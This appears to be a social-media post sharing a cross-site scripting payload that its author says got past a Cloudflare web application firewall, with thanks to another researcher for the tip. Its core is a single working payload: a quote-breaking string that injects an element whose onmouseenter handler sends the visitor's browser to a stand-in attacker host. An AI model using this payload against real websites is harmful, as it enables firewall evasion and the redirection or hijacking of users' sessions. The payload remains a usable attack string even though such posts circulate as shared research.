#XSS is about to control user actions. The cited tweet + https://t.co/8itR4RuXwn helped me to have #XSS done

Payload: ‘”><p only=1337 onmouseenter=window.location.href=//attacker.site>Over me 🙂

Thank you for sharing tips @brutelogic
#XSS #bypass #WAF #Cloudflare https://t.co/GGSOPLaT3d